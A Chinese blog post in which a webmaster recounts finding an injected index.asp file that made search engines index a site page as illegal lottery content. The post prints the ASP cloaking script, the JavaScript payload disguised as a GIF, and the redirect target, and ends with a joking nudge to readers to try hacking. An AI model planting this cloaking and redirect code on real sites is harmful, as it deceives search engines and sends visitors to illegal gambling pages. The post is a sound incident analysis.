搜索引擎欺骗病毒的一些研究

阅读更多

   之前网站上有一个专题总是被百度收录成非法彩票信息，打开网页看正常，页面源代码也查找不到非法彩票的相关字眼，甚是奇怪，未果。今日领导又提及此事，便不知如何是好，只能硬着头皮彻头彻尾的仔细寻找，更新cdn，杀毒软件扫描也正常，正在绝望之际，发现目录下多了个脚本文件index.asp。暗喜，原来罪魁祸首在此。把它rename，在用搜索抓取模拟器测试，正常。

    下面兴趣之余，打开文件来研究。

<%
Function check(user_agent)
    allow_agent=split("Baiduspider,Googlebot",",")
    check_agent=false
    For agents=lbound(allow_agent) to ubound(allow_agent)
        If instr(user_agent,allow_agent(agents))>0 then
            check_agent=true
            exit for
        end if 
    Next
    check=check_agent
End function
canshu=Request.ServerVariables("query_string")
user_agent=Request.ServerVariables("HTTP_USER_AGENT")
Refer=Request.ServerVariables("HTTP_REFERER")
If check(user_agent)=true then
%>

<%else%>
<%
Refer=Request.ServerVariables("HTTP_REFERER")
if Instr(Refer,"wd=%C1%F9%BA%CF%B2%CA")<>0 or Instr(Refer,"wd=%E5%85%AD%E5%90%88%E5%BD%A9")<>0 Then%>

<%
response.end
end if%>

<%end if%>

    因为本人是写java的，asp不太熟，而且只用过c#写asp，看上去又不像vb，不过从第一行就看得出它想做什么了。  allow_agent=split("Baiduspider,Googlebot",",")，显然，是对搜索引擎做处理，不用猜也知道，他下面的脚本应该是要欺骗搜索引擎了。欺骗搜索引擎，他应该要转向一个他自己的病毒页面，应该有url地址才对，但是脚本竟然没有url地址出现过，迷茫。

    但是，有个极为可以的地方，这个标签要加载一个js脚本，但是地址竟然是个gif图片？神奇。习惯上会把这个地址复制到浏览器上看看是啥玩意儿。失望，是一个红叉。

    以正常思路这个图片是不存在，但是谁又知道该地址背后隐藏的秘密？打开下载工具，把图片地址复制上去，保存为txt文件。不看不知道，一看吓一跳，打开文件竟然是熟悉的javascript脚本。如果不处处怀疑，做梦也不会想到这个不存在的图片就是关键所在。牛B。

    代码如下：

GIF89a="";
var d=document.referrer;
if ((d.indexOf("wd=%C1%F9%BA%CF%B2%CA")>0)||(d.indexOf("wd=%CF%E3%B8%DB%C1%F9%BA%CF%B2%CA")>0)){
if((window.location.href.indexOf("baotou")>0)||(window.location.href.indexOf("cnhubei")>0)){
window.location.href="http://www.58887888.net./";
}
else{
window.location.href="http://www.58887888.net./index2.htm";
}
}

    上面有两个url地址：ht tp://www.58887888.net./，ht tp://www.58887888.net./index2.htm，就是带非法彩票信息的页面了。不去研究又怎知道，原来我们看到的一个很正常的网页，在搜索引擎眼里竟然是一个非法彩票网页。欧麦嘎，这就是黑客，只要利用服务器的漏洞写入一个不到1kg的脚本文件，不仅把大家的肉眼欺骗了，连度娘和谷哥也蒙在鼓里，哈哈，是不是心动想做黑客了吧，心动不如行动。。。